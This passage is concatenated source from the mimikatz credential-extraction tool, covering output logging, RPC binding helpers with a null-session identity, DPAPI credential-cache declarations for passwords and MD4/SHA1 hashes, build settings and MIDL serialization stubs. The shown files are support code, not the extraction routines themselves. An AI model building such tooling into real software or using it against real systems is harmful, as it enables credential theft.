64 | BOOL kuhl_m_dpapi_oe_credential_addtoEntry(PKUHL_M_DPAPI_OE_CREDENTIAL_ENTRY entry, LPCGUID guid, LPCVOID md4hash, LPCVOID sha1hash, LPCVOID md4protectedhash, LPCWSTR password);
65 | BOOL kuhl_m_dpapi_oe_credential_copyEntryWithNewGuid(PKUHL_M_DPAPI_OE_CREDENTIAL_ENTRY entry, LPCGUID guid);
66 |
67 | BOOL kuhl_m_dpapi_oe_SaveToFile(LPCWSTR filename);
68 | BOOL kuhl_m_dpapi_oe_LoadFromFile(LPCWSTR filename);
--------------------------------------------------------------------------------
/modules/kull_m_output.c:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #include "kull_m_output.h"
7 |
8 | FILE * logfile = NULL;
9 | #if !defined(MIMIKATZ_W2000_SUPPORT)
10 | wchar_t * outputBuffer = NULL;
11 | size_t outputBufferElements = 0, outputBufferElementsPosition = 0;
12 | #endif
13 |
14 | void kprintf(PCWCHAR format, ...)
15 | {
16 | #if !defined(MIMIKATZ_W2000_SUPPORT)
17 | int varBuf;
18 | size_t tempSize;
19 | wchar_t * tmpBuffer;
20 | #endif
21 | va_list args;
22 | va_start(args, format);
23 | #if !defined(MIMIKATZ_W2000_SUPPORT)
24 | if(outputBuffer)
25 | {
26 | varBuf = _vscwprintf(format, args);
27 | if(varBuf > 0)
28 | {
29 | if((size_t) varBuf > (outputBufferElements - outputBufferElementsPosition - 1)) // NULL character
30 | {
31 | tempSize = (outputBufferElements + varBuf + 1) * 2; // * 2, just to be cool
32 | if(tmpBuffer = (wchar_t *) LocalAlloc(LPTR, tempSize * sizeof(wchar_t)))
33 | {
34 | RtlCopyMemory(tmpBuffer, outputBuffer, outputBufferElementsPosition * sizeof(wchar_t));
35 | LocalFree(outputBuffer);
36 | outputBuffer = tmpBuffer;
37 | outputBufferElements = tempSize;
38 | }
39 | else wprintf(L"Erreur LocalAlloc: %u\n", GetLastError());
40 | //if(outputBuffer = (wchar_t *) LocalReAlloc(outputBuffer, tempSize * sizeof(wchar_t), LPTR))
41 | // outputBufferElements = tempSize;
42 | //else wprintf(L"Erreur ReAlloc: %u\n", GetLastError());
43 | }
44 | varBuf = vswprintf_s(outputBuffer + outputBufferElementsPosition, outputBufferElements - outputBufferElementsPosition, format, args);
45 | if(varBuf > 0)
46 | outputBufferElementsPosition += varBuf;
47 | }
48 | }
49 | #endif
50 | #if !defined(_POWERKATZ)
51 | #if !defined(MIMIKATZ_W2000_SUPPORT)
52 | else
53 | #endif
54 | {
55 | vwprintf(format, args);
56 | fflush(stdout);
57 | }
58 | #endif
59 | if(logfile)
60 | {
61 | vfwprintf(logfile, format, args);
62 | fflush(logfile);
63 | }
64 | va_end(args);
65 | }
66 |
67 | void kprintf_inputline(PCWCHAR format, ...)
68 | {
69 | va_list args;
70 | va_start(args, format);
71 | if(logfile)
72 | {
73 | vfwprintf(logfile, format, args);
74 | fflush(logfile);
75 | }
76 | va_end(args);
77 | }
78 |
79 | BOOL kull_m_output_file(PCWCHAR file)
80 | {
81 | BOOL status = FALSE;
82 | FILE * newlog = NULL;
83 |
84 | if(file)
85 | #pragma warning(push)
86 | #pragma warning(disable:4996)
87 | newlog = _wfopen(file, L"a"); // XP does not like _wfopen_s
88 | #pragma warning(pop)
89 | if(newlog || !file)
90 | {
91 | if(logfile)
92 | fclose(logfile);
93 | logfile = newlog;
94 | }
95 | return (!file || (file && logfile));
96 | }
97 |
98 | int previousStdOut, previousStdErr;
99 | UINT previousConsoleOutput;
100 | void kull_m_output_init()
101 | {
102 | #if !defined(_POWERKATZ)
103 | #if !defined(_WINDLL)
104 | previousStdOut = _setmode(_fileno(stdout), _O_U8TEXT);
105 | previousStdErr = _setmode(_fileno(stderr), _O_U8TEXT);
106 | #endif
107 | previousConsoleOutput = GetConsoleOutputCP();
108 | SetConsoleOutputCP(CP_UTF8);
109 | #endif
110 | }
111 |
112 | void kull_m_output_clean()
113 | {
114 | #if !defined(_POWERKATZ)
115 | #if !defined(_WINDLL)
116 | _setmode(_fileno(stdout), previousStdOut);
117 | _setmode(_fileno(stderr), previousStdErr);
118 | #endif
119 | SetConsoleOutputCP(previousConsoleOutput);
120 | #endif
121 | }
--------------------------------------------------------------------------------
/modules/rpc/kull_m_rpc.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "globals.h"
8 | #ifndef __REQUIRED_RPCNDR_H_VERSION__
9 | #define __REQUIRED_RPCNDR_H_VERSION__ 475
10 | #endif
11 |
12 | #include
13 | #include
14 |
15 | #ifndef __RPCNDR_H_VERSION__
16 | #error this stub requires an updated version of
17 | #endif // __RPCNDR_H_VERSION__
18 |
19 | #include "midles.h"
20 | #include
21 | #include "../kull_m_string.h"
22 | #include "../kull_m_crypto.h"
23 |
24 | #define NDR_TSI_20 { {0x8a885d04, 0x1ceb, 0x11c9, { 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60 }}, { 2, 0 }}
25 |
26 | typedef DWORD NET_API_STATUS;
27 | typedef UNICODE_STRING RPC_UNICODE_STRING;
28 |
29 | LPCWSTR KULL_M_RPC_AUTHNLEV[7];
30 | LPCWSTR KULL_M_RPC_AUTHNSVC(DWORD AuthnSvc);
31 | const SEC_WINNT_AUTH_IDENTITY KULL_M_RPC_NULLSESSION;
32 |
33 | #define KULL_M_RPC_AUTH_IDENTITY_HANDLE_NULLSESSION ((RPC_AUTH_IDENTITY_HANDLE) &KULL_M_RPC_NULLSESSION)
34 |
35 | BOOL kull_m_rpc_createBinding(LPCWSTR uuid, LPCWSTR ProtSeq, LPCWSTR NetworkAddr, LPCWSTR Endpoint, LPCWSTR Service, BOOL addServiceToNetworkAddr, DWORD AuthnSvc, RPC_AUTH_IDENTITY_HANDLE hAuth, DWORD ImpersonationType, RPC_BINDING_HANDLE *hBinding, void (RPC_ENTRY * RpcSecurityCallback)(void *));
36 | BOOL kull_m_rpc_deleteBinding(RPC_BINDING_HANDLE *hBinding);
37 | RPC_STATUS CALLBACK kull_m_rpc_nice_SecurityCallback(RPC_IF_HANDLE hInterface, void* pBindingHandle);
38 | RPC_STATUS CALLBACK kull_m_rpc_nice_verb_SecurityCallback(RPC_IF_HANDLE hInterface, void* pBindingHandle);
39 | void kull_m_rpc_getArgs(int argc, wchar_t * argv[], LPCWSTR *szRemote, LPCWSTR *szProtSeq, LPCWSTR *szEndpoint, LPCWSTR *szService, LPCWSTR szDefaultService, DWORD *AuthnSvc, DWORD defAuthnSvc, BOOL *isNullSession, SEC_WINNT_AUTH_IDENTITY *pAuthIdentity, GUID *altGuid, BOOL printIt);
40 |
41 | typedef struct _KULL_M_RPC_FCNSTRUCT {
42 | PVOID addr;
43 | size_t size;
44 | } KULL_M_RPC_FCNSTRUCT, *PKULL_M_RPC_FCNSTRUCT;
45 |
46 | void __RPC_FAR * __RPC_USER midl_user_allocate(size_t cBytes);
47 | void __RPC_USER midl_user_free(void __RPC_FAR * p);
48 | void __RPC_USER ReadFcn(void *State, char **pBuffer, unsigned int *pSize);
49 | void __RPC_USER WriteFcn(void *State, char *Buffer, unsigned int Size);
50 | void __RPC_USER AllocFcn(void *State, char **pBuffer, unsigned int *pSize);
51 |
52 | #define RPC_EXCEPTION (RpcExceptionCode() != STATUS_ACCESS_VIOLATION) && \
53 | (RpcExceptionCode() != STATUS_DATATYPE_MISALIGNMENT) && \
54 | (RpcExceptionCode() != STATUS_PRIVILEGED_INSTRUCTION) && \
55 | (RpcExceptionCode() != STATUS_ILLEGAL_INSTRUCTION) && \
56 | (RpcExceptionCode() != STATUS_BREAKPOINT) && \
57 | (RpcExceptionCode() != STATUS_STACK_OVERFLOW) && \
58 | (RpcExceptionCode() != STATUS_IN_PAGE_ERROR) && \
59 | (RpcExceptionCode() != STATUS_ASSERTION_FAILURE) && \
60 | (RpcExceptionCode() != STATUS_STACK_BUFFER_OVERRUN) && \
61 | (RpcExceptionCode() != STATUS_GUARD_PAGE_VIOLATION)
62 |
63 | typedef void (* PGENERIC_RPC_DECODE) (IN handle_t pHandle, IN PVOID pObject);
64 | typedef void (* PGENERIC_RPC_ENCODE) (IN handle_t pHandle, IN PVOID pObject);
65 | typedef void (* PGENERIC_RPC_FREE) (IN handle_t pHandle, IN PVOID pObject);
66 | typedef size_t (* PGENERIC_RPC_ALIGNSIZE) (IN handle_t pHandle, IN PVOID pObject);
67 |
68 | BOOL kull_m_rpc_Generic_Decode(PVOID data, DWORD size, PVOID pObject, PGENERIC_RPC_DECODE fDecode);
69 | void kull_m_rpc_Generic_Free(PVOID data, PGENERIC_RPC_FREE fFree);
70 | BOOL kull_m_rpc_Generic_Encode(PVOID pObject, PVOID *data, DWORD *size, PGENERIC_RPC_ENCODE fEncode, PGENERIC_RPC_ALIGNSIZE fAlignSize);
--------------------------------------------------------------------------------
/chexport.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Express 2013 for Windows Desktop
4 | VisualStudioVersion = 12.0.21005.1
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "chexport", "chexport\chexport.vcxproj", "{FB9B5E61-7C34-4280-A211-E979E1D6977F}"
7 | EndProject
8 | Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "global files", "global files", "{1ADABD33-DEBE-4095-8EAE-9B6ED51DB68E}"
9 | ProjectSection(SolutionItems) = preProject
10 | appveyor.yml = appveyor.yml
11 | kiwi_passwords.yar = kiwi_passwords.yar
12 | mimicom.idl = mimicom.idl
13 | notrunk.lst = notrunk.lst
14 | README.md = README.md
15 | trunk.lst = trunk.lst
16 | EndProjectSection
17 | EndProject
18 | Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "lib", "lib", "{294B51F3-90EF-4F0A-BB04-20321A513A4F}"
19 | EndProject
20 | Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "x64", "x64", "{E9D1619F-D4A1-4AFA-B261-B01091EB8D56}"
21 | ProjectSection(SolutionItems) = preProject
22 | lib\x64\advapi32.hash.lib = lib\x64\advapi32.hash.lib
23 | lib\x64\bcrypt.lib = lib\x64\bcrypt.lib
24 | lib\x64\cryptdll.lib = lib\x64\cryptdll.lib
25 | lib\x64\fltlib.lib = lib\x64\fltlib.lib
26 | lib\x64\hid.lib = lib\x64\hid.lib
27 | lib\x64\msasn1.min.lib = lib\x64\msasn1.min.lib
28 | lib\x64\ncrypt.lib = lib\x64\ncrypt.lib
29 | lib\x64\netapi32.min.lib = lib\x64\netapi32.min.lib
30 | lib\x64\ntdll.min.lib = lib\x64\ntdll.min.lib
31 | lib\x64\samlib.lib = lib\x64\samlib.lib
32 | lib\x64\winsta.lib = lib\x64\winsta.lib
33 | EndProjectSection
34 | EndProject
35 | Global
36 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
37 | Release|ARM64 = Release|ARM64
38 | Release|Win32 = Release|Win32
39 | Release|x64 = Release|x64
40 | Second_Release_PowerShell|ARM64 = Second_Release_PowerShell|ARM64
41 | Second_Release_PowerShell|Win32 = Second_Release_PowerShell|Win32
42 | Second_Release_PowerShell|x64 = Second_Release_PowerShell|x64
43 | Simple_DLL|ARM64 = Simple_DLL|ARM64
44 | Simple_DLL|Win32 = Simple_DLL|Win32
45 | Simple_DLL|x64 = Simple_DLL|x64
46 | EndGlobalSection
47 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
48 | {FB9B5E61-7C34-4280-A211-E979E1D6977F}.Release|ARM64.ActiveCfg = Release|Win32
49 | {FB9B5E61-7C34-4280-A211-E979E1D6977F}.Release|Win32.ActiveCfg = Release|Win32
50 | {FB9B5E61-7C34-4280-A211-E979E1D6977F}.Release|Win32.Build.0 = Release|Win32
51 | {FB9B5E61-7C34-4280-A211-E979E1D6977F}.Release|x64.ActiveCfg = Release|x64
52 | {FB9B5E61-7C34-4280-A211-E979E1D6977F}.Release|x64.Build.0 = Release|x64
53 | {FB9B5E61-7C34-4280-A211-E979E1D6977F}.Second_Release_PowerShell|ARM64.ActiveCfg = Second_Release_PowerShell|Win32
54 | {FB9B5E61-7C34-4280-A211-E979E1D6977F}.Second_Release_PowerShell|Win32.ActiveCfg = Second_Release_PowerShell|Win32
55 | {FB9B5E61-7C34-4280-A211-E979E1D6977F}.Second_Release_PowerShell|Win32.Build.0 = Second_Release_PowerShell|Win32
56 | {FB9B5E61-7C34-4280-A211-E979E1D6977F}.Second_Release_PowerShell|x64.ActiveCfg = Second_Release_PowerShell|x64
57 | {FB9B5E61-7C34-4280-A211-E979E1D6977F}.Second_Release_PowerShell|x64.Build.0 = Second_Release_PowerShell|x64
58 | {FB9B5E61-7C34-4280-A211-E979E1D6977F}.Simple_DLL|ARM64.ActiveCfg = Simple_DLL|Win32
59 | {FB9B5E61-7C34-4280-A211-E979E1D6977F}.Simple_DLL|Win32.ActiveCfg = Simple_DLL|Win32
60 | {FB9B5E61-7C34-4280-A211-E979E1D6977F}.Simple_DLL|Win32.Build.0 = Simple_DLL|Win32
61 | {FB9B5E61-7C34-4280-A211-E979E1D6977F}.Simple_DLL|x64.ActiveCfg = Simple_DLL|x64
62 | {FB9B5E61-7C34-4280-A211-E979E1D6977F}.Simple_DLL|x64.Build.0 = Simple_DLL|x64
63 | EndGlobalSection
64 | GlobalSection(SolutionProperties) = preSolution
65 | HideSolutionNode = FALSE
66 | EndGlobalSection
67 | GlobalSection(NestedProjects) = preSolution
68 | {294B51F3-90EF-4F0A-BB04-20321A513A4F} = {1ADABD33-DEBE-4095-8EAE-9B6ED51DB68E}
69 | {E9D1619F-D4A1-4AFA-B261-B01091EB8D56} = {294B51F3-90EF-4F0A-BB04-20321A513A4F}
70 | EndGlobalSection
71 | GlobalSection(SubversionScc) = preSolution
72 | Svn-Managed = True
73 | Manager = AnkhSVN - Subversion Support for Visual Studio
74 | EndGlobalSection
75 | EndGlobal
76 |
--------------------------------------------------------------------------------
/chexport/chexport.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | local modules
6 |
7 |
8 | common modules
9 |
10 |
11 | common modules
12 |
13 |
14 | common modules
15 |
16 |
17 | common modules
18 |
19 |
20 | common modules
21 |
22 |
23 | local modules\dpapi
24 |
25 |
26 | local modules\dpapi
27 |
28 |
29 | local modules\dpapi\packages
30 |
31 |
32 | common modules\rpc
33 |
34 |
35 | common modules\rpc
36 |
37 |
38 | common modules
39 |
40 |
41 |
42 |
43 |
44 | local modules
45 |
46 |
47 | local modules
48 |
49 |
50 | common modules
51 |
52 |
53 | common modules
54 |
55 |
56 | common modules
57 |
58 |
59 | common modules
60 |
61 |
62 | common modules
63 |
64 |
65 | common modules
66 |
67 |
68 | local modules\dpapi
69 |
70 |
71 | local modules\dpapi
72 |
73 |
74 | local modules\dpapi\packages
75 |
76 |
77 | common modules\rpc
78 |
79 |
80 | common modules\rpc
81 |
82 |
83 | common modules
84 |
85 |
86 |
87 |
88 |
89 | {d7662bba-482f-4e4e-b70e-684a0ed816a3}
90 |
91 |
92 | {ec0aa01a-68b1-4d2d-8b9c-5725a903bd92}
93 |
94 |
95 |
96 |
97 | {17902a14-db65-4d8a-be9a-45fb98a65ec1}
98 |
99 |
100 | {0068506b-99c4-4d30-936a-d54598f49425}
101 |
102 |
103 | {36857c96-00a6-4cb6-8ca9-591d0561662c}
104 |
105 |
106 |
107 |
108 |
109 |
--------------------------------------------------------------------------------
/inc/globals.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include
8 | #define WIN32_NO_STATUS
9 | #define SECURITY_WIN32
10 | #define CINTERFACE
11 | #define COBJMACROS
12 | #include
13 | #include
14 | #include
15 | #include
16 | #include
17 | #include
18 | #include
19 | #include
20 | #include "../modules/kull_m_output.h"
21 | //#define KERBEROS_TOOLS
22 | //#define SERVICE_INCONTROL
23 | #define NET_MODULE
24 | #if defined(_M_ARM64)
25 | #define MIMIKATZ_ARCH L"arm64"
26 | #elif defined(_M_X64)
27 | #define MIMIKATZ_ARCH L"x64"
28 | #elif defined(_M_IX86)
29 | #define MIMIKATZ_ARCH L"x86"
30 | #endif
31 |
32 | #define MIMIKATZ L"mimikatz"
33 | #define MIMIKATZ_VERSION L"2.2.0"
34 | #define MIMIKATZ_CODENAME L"A La Vie, A L\'Amour"
35 | #define MIMIKATZ_MAX_WINBUILD L"19041"
36 | #define MIMIKATZ_FULL MIMIKATZ L" " MIMIKATZ_VERSION L" (" MIMIKATZ_ARCH L") #" MIMIKATZ_MAX_WINBUILD L" " TEXT(__DATE__) L" " TEXT(__TIME__)
37 | #define MIMIKATZ_SECOND L"\"" MIMIKATZ_CODENAME L"\""
38 | #define MIMIKATZ_DEFAULT_LOG MIMIKATZ L".log"
39 | #define MIMIKATZ_DRIVER L"mimidrv"
40 | #define MIMIKATZ_KERBEROS_EXT L"kirbi"
41 | #define MIMIKATZ_SERVICE MIMIKATZ L"svc"
42 |
43 | #if defined(_WINDLL)
44 | #define MIMIKATZ_AUTO_COMMAND_START 0
45 | #else
46 | #define MIMIKATZ_AUTO_COMMAND_START 1
47 | #endif
48 |
49 | #if defined(_POWERKATZ)
50 | #define MIMIKATZ_AUTO_COMMAND_STRING L"powershell"
51 | #else
52 | #define MIMIKATZ_AUTO_COMMAND_STRING L"commandline"
53 | #endif
54 |
55 | #if !defined(NT_SUCCESS)
56 | #define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
57 | #endif
58 |
59 | #if !defined(PRINT_ERROR)
60 | #define PRINT_ERROR(...) (kprintf(L"ERROR " TEXT(__FUNCTION__) L" ; " __VA_ARGS__))
61 | #endif
62 |
63 | #if !defined(PRINT_ERROR_AUTO)
64 | #define PRINT_ERROR_AUTO(func) (kprintf(L"ERROR " TEXT(__FUNCTION__) L" ; " func L" (0x%08x)\n", GetLastError()))
65 | #endif
66 |
67 | #if !defined(W00T)
68 | #define W00T(...) (kprintf(TEXT(__FUNCTION__) L" w00t! ; " __VA_ARGS__))
69 | #endif
70 |
71 | DWORD MIMIKATZ_NT_MAJOR_VERSION, MIMIKATZ_NT_MINOR_VERSION, MIMIKATZ_NT_BUILD_NUMBER;
72 |
73 | #if !defined(MS_ENH_RSA_AES_PROV_XP)
74 | #define MS_ENH_RSA_AES_PROV_XP L"Microsoft Enhanced RSA and AES Cryptographic Provider (Prototype)"
75 | #endif
76 |
77 | #if !defined(MS_PLATFORM_CRYPTO_PROVIDER)
78 | #define MS_PLATFORM_CRYPTO_PROVIDER L"Microsoft Platform Crypto Provider"
79 | #endif
80 |
81 | #if !defined(NCRYPT_PCP_PLATFORM_TYPE_PROPERTY)
82 | #define NCRYPT_PCP_PLATFORM_TYPE_PROPERTY L"PCP_PLATFORM_TYPE"
83 | #endif
84 |
85 | #if !defined(TPM_RSA_SRK_SEAL_KEY)
86 | #define TPM_RSA_SRK_SEAL_KEY L"MICROSOFT_PCP_KSP_RSA_SEAL_KEY_3BD1C4BF-004E-4E2F-8A4D-0BF633DCB074"
87 | #endif
88 |
89 | #if !defined(NCRYPT_SEALING_FLAG)
90 | #define NCRYPT_SEALING_FLAG 0x00000100
91 | #endif
92 |
93 | #if !defined(SCARD_PROVIDER_CARD_MODULE)
94 | #define SCARD_PROVIDER_CARD_MODULE 0x80000001
95 | #endif
96 |
97 | #define RtlEqualGuid(L1, L2) (RtlEqualMemory(L1, L2, sizeof(GUID)))
98 |
99 | #define SIZE_ALIGN(size, alignment) (size + ((size % alignment) ? (alignment - (size % alignment)) : 0))
100 | #define KIWI_NEVERTIME(filetime) (*(PLONGLONG) filetime = MAXLONGLONG)
101 |
102 | #define LM_NTLM_HASH_LENGTH 16
103 |
104 | #define KULL_M_WIN_BUILD_XP 2600
105 | #define KULL_M_WIN_BUILD_2K3 3790
106 | #define KULL_M_WIN_BUILD_VISTA 6000
107 | #define KULL_M_WIN_BUILD_7 7600
108 | #define KULL_M_WIN_BUILD_8 9200
109 | #define KULL_M_WIN_BUILD_BLUE 9600
110 | #define KULL_M_WIN_BUILD_10_1507 10240
111 | #define KULL_M_WIN_BUILD_10_1511 10586
112 | #define KULL_M_WIN_BUILD_10_1607 14393
113 | #define KULL_M_WIN_BUILD_10_1703 15063
114 | #define KULL_M_WIN_BUILD_10_1709 16299
115 | #define KULL_M_WIN_BUILD_10_1803 17134
116 | #define KULL_M_WIN_BUILD_10_1809 17763
117 | #define KULL_M_WIN_BUILD_10_1903 18362
118 | #define KULL_M_WIN_BUILD_10_1909 18363
119 | #define KULL_M_WIN_BUILD_10_2004 19041
120 | #define KULL_M_WIN_BUILD_10_20H2 19042
121 | #define KULL_M_WIN_BUILD_2022 20348
122 |
123 | #define KULL_M_WIN_MIN_BUILD_XP 2500
124 | #define KULL_M_WIN_MIN_BUILD_2K3 3000
125 | #define KULL_M_WIN_MIN_BUILD_VISTA 5000
126 | #define KULL_M_WIN_MIN_BUILD_7 7000
127 | #define KULL_M_WIN_MIN_BUILD_8 8000
128 | #define KULL_M_WIN_MIN_BUILD_BLUE 9400
129 | #define KULL_M_WIN_MIN_BUILD_10 9800
130 | #define KULL_M_WIN_MIN_BUILD_11 22000
--------------------------------------------------------------------------------
/modules/rpc/kull_m_rpc_dpapi-entries.c:
--------------------------------------------------------------------------------
1 | #include "kull_m_rpc_dpapi-entries.h"
2 |
3 | #if defined(_M_X64) || defined(_M_ARM64) // TODO:ARM64
4 | #define _dpapi2Dentries_MIDL_TYPE_FORMAT_STRING_SIZE 241
5 | #define _dpapi2Dentries_MIDL_TYPE_FORMAT_OFFSET 210
6 | #elif defined(_M_IX86)
7 | #define _dpapi2Dentries_MIDL_TYPE_FORMAT_STRING_SIZE 299
8 | #define _dpapi2Dentries_MIDL_TYPE_FORMAT_OFFSET 254
9 | #endif
10 |
11 | typedef struct _dpapi2Dentries_MIDL_TYPE_FORMAT_STRING {
12 | SHORT Pad;
13 | UCHAR Format[_dpapi2Dentries_MIDL_TYPE_FORMAT_STRING_SIZE];
14 | } dpapi2Dentries_MIDL_TYPE_FORMAT_STRING;
15 |
16 | extern const dpapi2Dentries_MIDL_TYPE_FORMAT_STRING dpapi2Dentries__MIDL_TypeFormatString;
17 | static const RPC_CLIENT_INTERFACE DPAPIEntries___RpcClientInterface = {sizeof(RPC_CLIENT_INTERFACE), {{0xa89c7745, 0x786b, 0x4d4e, {0x8d, 0x34, 0xc6, 0x8e, 0x8e, 0xc6, 0xc5, 0xfb}}, {1, 0}}, {{0x8a885d04, 0x1ceb, 0x11c9, {0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60}}, {2, 0}}, 0, 0, 0, 0, 0, 0x00000000};
18 | static const MIDL_TYPE_PICKLING_INFO __MIDL_TypePicklingInfo = {0x33205054, 0x3, 0, 0, 0,};
19 | static RPC_BINDING_HANDLE DPAPIEntries__MIDL_AutoBindHandle;
20 | static const MIDL_STUB_DESC DPAPIEntries_StubDesc = {(void *) &DPAPIEntries___RpcClientInterface, MIDL_user_allocate, MIDL_user_free, &DPAPIEntries__MIDL_AutoBindHandle, 0, 0, 0, 0, dpapi2Dentries__MIDL_TypeFormatString.Format, 1, 0x60000, 0, 0x8000253, 0, 0, 0, 0x1, 0, 0, 0};
21 |
22 | size_t KUHL_M_DPAPI_ENTRIES_AlignSize(handle_t _MidlEsHandle, KUHL_M_DPAPI_ENTRIES * _pType)
23 | {
24 | return NdrMesTypeAlignSize2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO) &__MIDL_TypePicklingInfo, &DPAPIEntries_StubDesc, (PFORMAT_STRING) &dpapi2Dentries__MIDL_TypeFormatString.Format[_dpapi2Dentries_MIDL_TYPE_FORMAT_OFFSET], _pType);
25 | }
26 |
27 | void KUHL_M_DPAPI_ENTRIES_Encode(handle_t _MidlEsHandle, KUHL_M_DPAPI_ENTRIES * _pType)
28 | {
29 | NdrMesTypeEncode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO) &__MIDL_TypePicklingInfo, &DPAPIEntries_StubDesc, (PFORMAT_STRING) &dpapi2Dentries__MIDL_TypeFormatString.Format[_dpapi2Dentries_MIDL_TYPE_FORMAT_OFFSET], _pType);
30 | }
31 |
32 | void KUHL_M_DPAPI_ENTRIES_Decode(handle_t _MidlEsHandle, KUHL_M_DPAPI_ENTRIES * _pType)
33 | {
34 | NdrMesTypeDecode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO) &__MIDL_TypePicklingInfo, &DPAPIEntries_StubDesc, (PFORMAT_STRING) &dpapi2Dentries__MIDL_TypeFormatString.Format[_dpapi2Dentries_MIDL_TYPE_FORMAT_OFFSET], _pType);
35 | }
36 |
37 | void KUHL_M_DPAPI_ENTRIES_Free(handle_t _MidlEsHandle, KUHL_M_DPAPI_ENTRIES * _pType)
38 | {
39 | NdrMesTypeFree2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO) &__MIDL_TypePicklingInfo, &DPAPIEntries_StubDesc, (PFORMAT_STRING) &dpapi2Dentries__MIDL_TypeFormatString.Format[_dpapi2Dentries_MIDL_TYPE_FORMAT_OFFSET], _pType);
40 | }
41 | #if defined(_M_X64) || defined(_M_ARM64) // TODO:ARM64
42 | static const dpapi2Dentries_MIDL_TYPE_FORMAT_STRING dpapi2Dentries__MIDL_TypeFormatString = {0, {
43 | 0x00, 0x00, 0x1d, 0x00, 0x08, 0x00, 0x01, 0x5b, 0x15, 0x03, 0x10, 0x00, 0x08, 0x06, 0x06, 0x4c, 0x00, 0xf1, 0xff, 0x5b, 0x1d, 0x00, 0x14, 0x00, 0x02, 0x5b, 0x1b, 0x00, 0x01, 0x00, 0x19, 0x00,
44 | 0x24, 0x00, 0x01, 0x00, 0x02, 0x5b, 0x1a, 0x03, 0x30, 0x00, 0x00, 0x00, 0x0e, 0x00, 0x4c, 0x00, 0xd8, 0xff, 0x4c, 0x00, 0xe0, 0xff, 0x08, 0x36, 0x5c, 0x5b, 0x12, 0x00, 0xde, 0xff, 0x21, 0x03,
45 | 0x00, 0x00, 0x19, 0x00, 0x00, 0x00, 0x01, 0x00, 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x12, 0x00, 0xd6, 0xff, 0x5c, 0x5b, 0x1d, 0x00, 0x10, 0x00, 0x02, 0x5b, 0x1a, 0x03, 0x90, 0x00, 0x00, 0x00,
46 | 0x22, 0x00, 0x08, 0x4c, 0x00, 0xa3, 0xff, 0x40, 0x36, 0x4c, 0x00, 0xe9, 0xff, 0x4c, 0x00, 0xa5, 0xff, 0x4c, 0x00, 0xa1, 0xff, 0x4c, 0x00, 0x9d, 0xff, 0x4c, 0x00, 0xd9, 0xff, 0x4c, 0x00, 0x95,
47 | 0xff, 0x5b, 0x12, 0x08, 0x25, 0x5c, 0x21, 0x03, 0x00, 0x00, 0x19, 0x00, 0x10, 0x00, 0x01, 0x00, 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x12, 0x00, 0xc2, 0xff, 0x5c, 0x5b, 0x1b, 0x00, 0x01, 0x00,
48 | 0x19, 0x00, 0x14, 0x00, 0x01, 0x00, 0x02, 0x5b, 0x1a, 0x03, 0x20, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x4c, 0x00, 0x56, 0xff, 0x08, 0x08, 0x36, 0x5b, 0x12, 0x00, 0xe2, 0xff, 0x21, 0x03, 0x00, 0x00,
49 | 0x19, 0x00, 0x20, 0x00, 0x01, 0x00, 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x12, 0x00, 0xda, 0xff, 0x5c, 0x5b, 0x1a, 0x03, 0x30, 0x00, 0x00, 0x00, 0x0c, 0x00, 0x08, 0x40, 0x36, 0x08, 0x40, 0x36,
50 | 0x08, 0x40, 0x36, 0x5b, 0x12, 0x00, 0x58, 0xff, 0x12, 0x00, 0x9c, 0xff, 0x12, 0x00, 0xce, 0xff, 0x00,
51 | }};
52 | #elif defined(_M_IX86)
53 | static const dpapi2Dentries_MIDL_TYPE_FORMAT_STRING dpapi2Dentries__MIDL_TypeFormatString = {0, {
54 | 0x00, 0x00, 0x1d, 0x00, 0x08, 0x00, 0x01, 0x5b, 0x15, 0x03, 0x10, 0x00, 0x08, 0x06, 0x06, 0x4c, 0x00, 0xf1, 0xff, 0x5b, 0x1d, 0x00, 0x14, 0x00, 0x02, 0x5b, 0x1b, 0x00, 0x01, 0x00, 0x19, 0x00,
55 | 0x24, 0x00, 0x01, 0x00, 0x02, 0x5b, 0x16, 0x03, 0x2c, 0x00, 0x4b, 0x5c, 0x46, 0x5c, 0x28, 0x00, 0x28, 0x00, 0x12, 0x00, 0xe6, 0xff, 0x5b, 0x4c, 0x00, 0xcf, 0xff, 0x4c, 0x00, 0xd7, 0xff, 0x08,
56 | 0x08, 0x5b, 0x1b, 0x03, 0x04, 0x00, 0x19, 0x00, 0x00, 0x00, 0x01, 0x00, 0x4b, 0x5c, 0x48, 0x49, 0x04, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x12, 0x00, 0xca, 0xff, 0x5b, 0x08,
